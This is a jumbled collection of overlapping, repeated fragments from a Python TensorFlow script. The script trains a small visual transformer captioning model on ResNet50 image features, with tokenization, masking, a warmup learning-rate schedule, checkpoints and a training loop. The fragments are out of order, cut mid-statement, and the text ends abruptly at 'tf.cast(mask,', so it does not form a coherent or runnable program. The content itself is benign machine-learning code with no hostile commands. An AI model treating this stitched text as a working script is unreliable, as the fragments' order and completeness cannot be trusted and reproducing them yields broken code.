#", "# plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none')", "enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _ =", "= tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ =", "def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32)", "control the size and complexity of the model # BERT (base) uses 12", "{} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(),", "x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for training #########################", "print(e) ############################################### ######################### # Load Data file mapping captions to images ######################### prefix", "be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU usage", "# We will set this as the max length of captions # which", "1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2 == 0: ckpt_save_path", "len(cap_tokenizer.encode(x.lower()))) # We will set this as the max length of captions #", "dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the numpy files in", "tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating masks def create_masks(inp, tar): #", "must be set before GPUs have been initialized print(e) ############################################### ######################### # Load", "= inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for", "num_heads = 8 # BERT Base Model # num_layers = 12 # d_model", "all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd", "end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x)", "/ tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function", "tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only use the first GPU try:", "# Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt,", "train_step(inp, tar): tar_inp = tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask", "@tf.function def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask,", "pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer", "# input shape should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) #", "128 dff = d_model * 4 num_heads = 8 # BERT Base Model", "to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to", "restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training", "GPU\") except RuntimeError as e: # Visible devices must be set before GPUs", "CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model,", "Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result()))", "######################### # Build Transformer Model ######################### # These parameters control the size and", "as per `Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model,", "input received by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask", "Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0))", "prefix = './data/' save_prefix = prefix + \"features/\" # for storing prefixes annot", "time import datetime from tqdm import tqdm # our visual transformer code import", "tokenization # tfds demonstrated in earlier chapters # This is a quick way", "tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the numpy files in parallel dataset", "tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import numpy", "# Training Loops ######################### # setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE =", "def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask,", "training on GPU ## ## this is important for running CuDNN on GPU", "enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables))", "# captions, # test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions # Load", "to mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st", "reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask", "from glob import glob from PIL import Image import pickle import re import", "d_model = 768 # dff = d_model * 4 # as per BERT", "on GPU capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)", "inp -> images, tar -> caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp,", "inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet", "as pd from sklearn.model_selection import train_test_split import json from glob import glob from", "len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") #", "return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now", "rate=dropout_rate, use_pe=False ) ######################### # Training Setup ######################### # Learning Rate Schedule, as", "devices must be set before GPUs have been initialized print(e) ############################################### ######################### #", "# tfds demonstrated in earlier chapters # This is a quick way if", "combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss)", "in earlier chapters # This is a quick way if data fits in", "TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU')", "tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to compute a column with the", "prefixes annot = prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data", "# dff = d_model * 4 # as per BERT paper # num_heads", "return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer,", "and complexity of the model # BERT (base) uses 12 layers, 768 as", "numpy file with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return", "d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 =", "ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format(", "######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top of", "12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate = 0.1 EPOCHS", "of captions # which cover 99% of the captions without truncation max_len =", "This padding mask is used to mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq)", "the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops", "0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch + 1,", "with the new name of the saved image feature file inputs['img_features'] = inputs['image'].map(lambda", "set before GPUs have been initialized print(e) ############################################### ######################### # Load Data file", "decoder. # This padding mask is used to mask the encoder outputs. dec_padding_mask", "from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import numpy as np import", "Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True,", "dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp,", "num_layers = 12 # d_model = 768 # dff = d_model * 4", "ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch + 1, ckpt_save_path))", "is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__()", "file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare", "# setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can reduce", "lens = inputs['caption'].map(lambda x: len(x.split())) # Max length of captions after tokenization #", "decoder. # It is used to pad and mask future tokens in the", "future tokens in the input received by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1])", "inputs['caption'].map(lambda x: len(x.split())) # Max length of captions after tokenization # tfds demonstrated", "if len(x) < max_len: x = x + [0] * int(max_len - len(x))", "save_prefix = prefix + \"features/\" # for storing prefixes annot = prefix +", "tokens in the input received by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask", "Step\") ######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real,", "1) % 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {}", "dff = d_model * 4 num_heads = 8 # BERT Base Model #", "names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file(", "surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions split by spaces lens =", "tokens start = '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start", "\"features/\" # for storing prefixes annot = prefix + 'data.csv' inputs = pd.read_csv(annot,", "######################### # Training Loops ######################### # setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE", "test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions # Load the numpy file", "optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch in range(EPOCHS): start_tm", "int(lens.quantile(0.99) + 1) # for special tokens start = '<s>' end = '</s>'", "for running CuDNN on GPU ## tf.keras.backend.clear_session() # - for easy reset of", "lambda x: start + x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def", "tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for", "= tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) #", "easy reset of notebook state # chck if GPU can be seen by", "= np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to", "tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables)", "be 1's # input shape should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0],", "pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup #########################", "reset of notebook state # chck if GPU can be seen by TF", "for training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took", "= vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask", "Used in the 2nd attention block in the decoder. # This padding mask", "2nd attention block in the decoder. # This padding mask is used to", "create_masks(inp, tar): # Encoder padding mask - This should just be 1's #", "hydrated\") # Max length of captions split by spaces lens = inputs['caption'].map(lambda x:", "print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1,", "ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops ######################### # setup training parameters", "padded/truncated\") # now to compute a column with the new name of the", "the schedule: uncomment to plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule =", "# now to compute a column with the new name of the saved", "vt.create_padding_mask(inp_seq) # Used in the 1st attention block in the decoder. # It", "= tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating masks def create_masks(inp, tar):", "Build Transformer Model ######################### # These parameters control the size and complexity of", "if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops ######################### # setup", "Restrict TensorFlow to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU')", "######################### # Load Data file mapping captions to images ######################### prefix = './data/'", "tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if", "checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) #", "train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2 == 0: ckpt_save_path = ckpt_manager.save()", "== 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch +", "if not training on GPU ## ## this is important for running CuDNN", "if (epoch + 1) % 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint", "BERT (base) uses 12 layers, 768 as embedding dim, 12 attention heads #", "self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step)", "batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch", "1's # input shape should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]])", "pd from sklearn.model_selection import train_test_split import json from glob import glob from PIL", "cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the numpy files", "earlier chapters # This is a quick way if data fits in memory", "datetime from tqdm import tqdm # our visual transformer code import visual_transformer as", "the captions without truncation max_len = int(lens.quantile(0.99) + 1) # for special tokens", "feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### #", "for storing prefixes annot = prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\",", "dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy =", "the new name of the saved image feature file inputs['img_features'] = inputs['image'].map(lambda x:", "optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to plot", "tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets", "as vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please comment", "inputs.img_features.tolist() # we only took half validation examples so we dont need to", "as the max length of captions # which cover 99% of the captions", "load the numpy files in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature,", "= dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To", "4H (4x768) as feedforward size # Small Model num_layers = 4 d_model =", "x: start + x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x):", "__init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps", "% 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {} at", "a column with the new name of the saved image feature file inputs['img_features']", "vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False )", "cap_train = img_names, captions # Load the numpy file with extracted ResNet50 feature", "and padded/truncated\") # now to compute a column with the new name of", "setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5)", "Visualize the schedule: uncomment to plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule", "start = '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start +", "of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions split by spaces", "= ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch", "*= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy')", "img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import numpy as np", "GPUs have been initialized print(e) ############################################### ######################### # Load Data file mapping captions", "# already includes start/end tokens dropout_rate = 0.1 EPOCHS = 20 # should", "captions # Load the numpy file with extracted ResNet50 feature def load_image_feature(img_name, cap):", "######################### # These parameters control the size and complexity of the model #", "Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path,", "not training on GPU ## ## this is important for running CuDNN on", "import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as", "latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops #########################", "train_step(inp, tar) if batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}]", "ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken", "chapters # This is a quick way if data fits in memory lens", "encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st attention block in", "# - for easy reset of notebook state # chck if GPU can", "captions after tokenization # tfds demonstrated in earlier chapters # This is a", "######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred):", "input shape should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all", "dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real,", "already includes start/end tokens dropout_rate = 0.1 EPOCHS = 20 # should see", "pandas as pd from sklearn.model_selection import train_test_split import json from glob import glob", "return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the", "column with the new name of the saved image feature file inputs['img_features'] =", "# Perform one step of raining on one batch in an epoch @tf.function", "(inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch % 100 == 0: ts", "+ 1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2 == 0:", "length of captions # which cover 99% of the captions without truncation max_len", "glob import glob from PIL import Image import pickle import re import os", "= tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore the latest checkpoint.", "== 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f}", "visual_transformer as vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please", "= d_model * 4 num_heads = 8 # BERT Base Model # num_layers", "tar): tar_inp = tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask =", "file mapping captions to images ######################### prefix = './data/' save_prefix = prefix +", "FOR RTX 2070/NVidia GPU ############### ## Please comment out if not training on", "TensorFlow to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus", "numpy files in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2],", "0.1 EPOCHS = 20 # should see results in 4-10 epochs also transformer", "uses 12 layers, 768 as embedding dim, 12 attention heads # and 4H", "vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please comment out", "BERT Base Model # num_layers = 12 # d_model = 768 # dff", "riding a wave on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length", "captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len: x", "and mask future tokens in the input received by # the decoder. look_ahead_mask", "epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch", "tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)", "for creating masks def create_masks(inp, tar): # Encoder padding mask - This should", "to images ######################### prefix = './data/' save_prefix = prefix + \"features/\" # for", "= tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists,", "+ x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x =", "BERT paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end", "validation examples so we dont need to split # img_train, img_val, cap_train, cap_val", "# plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and", "'</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip() + end) print(\"Some prepared", "CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to", "Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step", "dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on", "to load the numpy files in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function(", "cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train, cap_train =", "mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st attention", "img_train, cap_train = img_names, captions # Load the numpy file with extracted ResNet50", "only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU')", "x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist()", "# Training Setup ######################### # Learning Rate Schedule, as per `Attention is All", "0)) loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return", "attention block in the decoder. # It is used to pad and mask", "tar): # Encoder padding mask - This should just be 1's # input", "batch in an epoch @tf.function def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real", "chck if GPU can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only", "size # Small Model num_layers = 4 d_model = 128 dff = d_model", "tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper", "import pandas as pd from sklearn.model_selection import train_test_split import json from glob import", "tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore", "x = x + [0] * int(max_len - len(x)) return x[:max_len] inputs['tokens'] =", "# for special tokens start = '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map(", "checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops ######################### #", "masks def create_masks(inp, tar): # Encoder padding mask - This should just be", "epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels", "Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model", "of captions after tokenization # tfds demonstrated in earlier chapters # This is", "Training for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp ->", "and 4H (4x768) as feedforward size # Small Model num_layers = 4 d_model", "tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask", "by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus =", "num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate =", "tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as", "tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import numpy as np import pandas", "import os import time import datetime from tqdm import tqdm # our visual", "inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for training", "= step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate =", "as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\")", "######################### # setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can", "x: len(cap_tokenizer.encode(x.lower()))) # We will set this as the max length of captions", "CuDNN on GPU ## tf.keras.backend.clear_session() # - for easy reset of notebook state", "loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding", "inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to compute", "in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]),", "to split # img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2,", "import train_test_split import json from glob import glob from PIL import Image import", "optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore the", "be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd attention block in", "Data file mapping captions to images ######################### prefix = './data/' save_prefix = prefix", "This is a quick way if data fits in memory lens = inputs['caption'].map(lambda", "compute a column with the new name of the saved image feature file", "beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to plot # import matplotlib.pyplot", "import numpy as np import pandas as pd from sklearn.model_selection import train_test_split import", "= tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e: #", "pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss", "+ 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### #", "prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") #########################", "+ 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch: {} secs\\n'.format(time.time() - start_tm))", "* (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer", "True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients,", "= cap_tokenizer.encode(x) if len(x) < max_len: x = x + [0] * int(max_len", "numpy as np import pandas as pd from sklearn.model_selection import train_test_split import json", "PIL import Image import pickle import re import os import time import datetime", "epoch @tf.function def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real = tar[:, 1:]", "GPU can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check", "as embedding dim, 12 attention heads # and 4H (4x768) as feedforward size", "mask = tf.cast(mask, 